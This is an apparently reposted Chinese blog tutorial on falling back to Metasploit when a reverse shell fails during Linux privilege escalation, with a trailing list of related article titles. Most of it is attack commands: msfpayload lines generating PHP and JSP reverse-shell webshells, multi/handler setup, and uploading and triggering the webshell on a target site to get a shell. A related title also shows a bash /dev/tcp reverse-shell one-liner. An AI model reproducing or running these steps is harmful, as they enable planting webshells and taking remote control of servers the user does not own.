当LINUX提权反弹不了时.经常遇到这种情况 请出MSF ..

1 .生成WEBSHELL文件
msf > msfpayload php/reverse_php LHOST=你的IP LPORT=端口 R > dis9.php
我的BT4是在/ROOT/ 目录 然后吧dis9.php加 才能运行
把dis9.php传进你的SHELL里 例如 www.91ri.org/dis9.php

2 . 然后MSF设置接口模板和参数
msf > use multi/handler //进入 multi/handler 接口
msf exploit(handler) > set PAYLOAD php/reverse_php //写入模块 不清楚的可以先 info php/reverse_php 看看介绍
msf exploit(handler) > set LHOST 你的IP //生成dis9.php的LHOST的IP 也就是你的IP 要一样
msf exploit(handler) > set LPORT 8080 //同上
msf exploit(handler) > exploit //执行

3.反弹SHELL
然后访问你的dis9.php
root@bt4:links www.91ri.org/dis9.php
这样就会反弹一个SHELL
我们就可以继续FUCK ALL

/
JSP
msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.10.1 R > balckrootkit.jsp
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcp
set PAYLOAD java/jsp_shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.10.1
LHOST => 192.168.10.1
——————————————————-
这里没SET端口 默认的4444

转载于:https://www.cnblogs.com/mujj/articles/2184641.html

当Linux提权不能反弹Shell时利用metasploit进行提权相关推荐

  1. linux下几种反弹Shell方法的总结与理解

    实验环境 CentOS 6.5:192.168.0.3 kali2.0:192.168.0.4 方法1: 反弹shell命令如下: bash -i >& /dev/tcp/ip/port ...

  2. 提权(概述、水平/垂直越权、windows/linux提权、反弹shell、Linux_Exploit_Suggester、searchsploit)

    文章目录 提权 一.概述 二.水平越权&垂直越权 三.分类 - windows 1. 基于windows2003 2. 基于windows2008 3. ms SQL提权 5. nc反弹she ...

  3. 059 提权与反弹shell

    文章目录 一:权限提升概述 二:windows提权 2.1: 启动项提权 2.2:系统漏洞提权 2.2.1:笔记 2.2.2:部分截图 2.2.3:收集到的漏洞列表: 2.2.4:windows200 ...

  4. 【好文转载】linux反弹shell的各种姿势

    本文为转载,原作者与链接如下: 作者:@11阳光 https://www.cnblogs.com/sunny11/p/14290092.html 题记 搞完xss钓鱼一时不知道服务器还能干点什么,然后 ...

  5. 网络安全-木马入侵windows -msfvenom反弹shell(CMD)

    网络安全-木马入侵windows -msfvenom反弹shell(CMD) 前言 一,我也是初学者记录的笔记 二,可能有错误的地方,请谨慎 三,欢迎各路大神指教 四,任何文章仅作为学习使用 五,学习 ...

  6. 常见的反弹shell的方法以及对反弹shell的解释

    文章目录 一.什么是反弹shell,以及对反弹shell作用原理的解析: 3.反弹shell的本质 linux文件描述符 重定向 输入重定向 输出重定向 标准输出与标准错误输出重定向 文件描述符的复制 ...

  7. mysql 反弹shell_Linux下几种反弹Shell方法的总结与理解

    *本文原创作者:LlawLiet,本文属FreeBuf原创奖励计划,未经许可禁止转载. 之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了 ...

  8. 安全技术系列之反弹Shell

    原文出处:https://xz.aliyun.com/t/9488 前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹个shell是再常见不过的事情了. 反弹shell, ...

  9. 【转】反弹Shell,看这一篇就够了

    前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹个shell是再常见不过的事情了. 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到 ...

最新文章

  1. 使用ComplexHeatmap包绘制个性化热图
  2. 【有三吐槽】程序员改BUG的六重境界,你,第几重了?
  3. 记录第一次使用Texlive+TexStudio写论文时遇到的问题(随时更新)
  4. 650c公路车推荐_2020最具性价比的中高端公路整车盘点
  5. 11月8日PHP练习《留言板》
  6. mysql8参数方案_Mysql8.0及以上 only_full_group_by以及其他关于sql_mode原因报错详细解决方案...
  7. 【BZOJ5338】[TJOI2018]异或(主席树)
  8. 中国企业软件为什么如此的难
  9. C盘文件分析(如何减小C盘容量)
  10. Django深入模板引擎
  11. jeb配置java环境_android逆向工具Jeb第一次启动
  12. 图像边缘检测之Prewitt算子
  13. 通用办公报表打印软件
  14. HTML5表单技术 调查问卷设计
  15. C#更新word目录
  16. Uber天使投资人杰森卡拉卡尼斯投资…
  17. java 迭代_java迭代是什么意思
  18. 坚持终身学习的重要性:只靠已有知识,你走不了多远
  19. 红外光谱曲线的基线调整
  20. web表格CSS 属性

热门文章

  1. linux diff命令_Linux diff命令示例
  2. Linux翻页命令more和less
  3. linux程序崩溃时调用链,Linux 获取并分析程序崩溃时的调用堆栈
  4. Hibernate query by Example
  5. Index of Test
  6. 使用IDEA创建一个Servlet应用程序
  7. Django基础核心技术之Model模型的介绍与设计
  8. sqlserver安装检测不通过 (重新启动失败)
  9. 能量项链(NOIP 2006 提高组)
  10. 【Java并发编程】之八:多线程环境中安全使用集合API